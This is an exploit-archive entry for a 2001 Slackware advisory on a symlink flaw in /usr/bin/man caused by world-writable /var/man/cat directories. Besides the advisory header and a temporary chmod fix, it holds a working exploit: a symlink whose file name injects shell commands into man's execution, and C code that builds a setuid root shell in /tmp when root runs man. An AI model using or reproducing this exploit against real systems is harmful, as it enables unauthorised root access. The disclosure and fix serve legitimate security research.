slackware.man.c

slackware.man.c: Posted Jul 18, 2001; Authored by Zen-Parse, Josh, Lockdown; Slackware 8.0 and below ships with /var/man/cat* chmodded 1777, making it vulnerable to symlink attacks. This exploit creates a suid shell with the UID of the user running man.; tags | exploit, shell; systems | linux, slackware; SHA-256 | 0fb25cf68a4fba71eceef2ca23db4efbe592af7e1416b2d13051e5e4b6990a46; Download | Favorite | View

slackware.man.c

The following advisory was sent to slackware July 11th, 2001, they failed
to respond so I hope the temporary patch will make do:

Submitted by  : Josh (josh@pulltheplug.com), lockdown (lockdown@lockeddown.net)
                zen-parse (zen-parse@gmx.net)
Vulnerability : /usr/bin/man
Tested On     : Slackware 8.0 and before.
Local         : Yes
Remote        : No
Temporary Fix : chmod 700 /var/man/cat*
Target        : root or any other user that uses man
Greets to     : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,
                slider, cryptix, s0ttle, xphantom, qtip, Sultrix, Defiance,
                Insane, rusko, falcon-networks.com.
See also      : http://www.securityfocus.com/vdb/?id=2815



        Slackware 8.0 and previous issues of Slackware are released with
/var/man/cat*/ chmod 1777:

drwxrwxrwt 2 root root 4096 Jul 11 11:03 cat*/

Since these directories are world writeable we can create symlinks there
like so:

`ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.
;script;man.7"
/var/man/cat7/man.7.gz`

When `/usr/bin/man man` is executed by root, it will create
/var/man/cat7/man.1.gz.  The symlink forces it to create a file in
/usr/man/man7 named:
"/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.;
script;man.7.gz."

/usr/bin/man will then execute /tmp/script which contains:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>

int main()
{
  FILE *fil;
  mode_t perm = 06711;

  if(!getuid()) {
    fil = fopen("/tmp/bleh.c","w");
    fprintf(fil,"%s\n","#include <unistd.h>");
    fprintf(fil,"%s\n","#include <stdio.h>");
    fprintf(fil,"%s\n","int main() {");
    fprintf(fil,"%s\n","setreuid(0,0);setregid(0,0);");
    fprintf(fil,"%s\n","execl(\"/bin/su\",\"su\",NULL);");
    fprintf(fil,"%s\n","return 0; }");
    fclose(fil);
    system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c");
    unlink("/tmp/bleh.c");
    chmod("/tmp/bleh", perm);
  }
   execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL);
   return 0;
}

With the above code compiled in /tmp/script, if root were to run `man man`, a
suid shell would be left in /tmp/bleh.

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

slackware.man.c

slackware.man.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

slackware.man.c

Share This

slackware.man.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems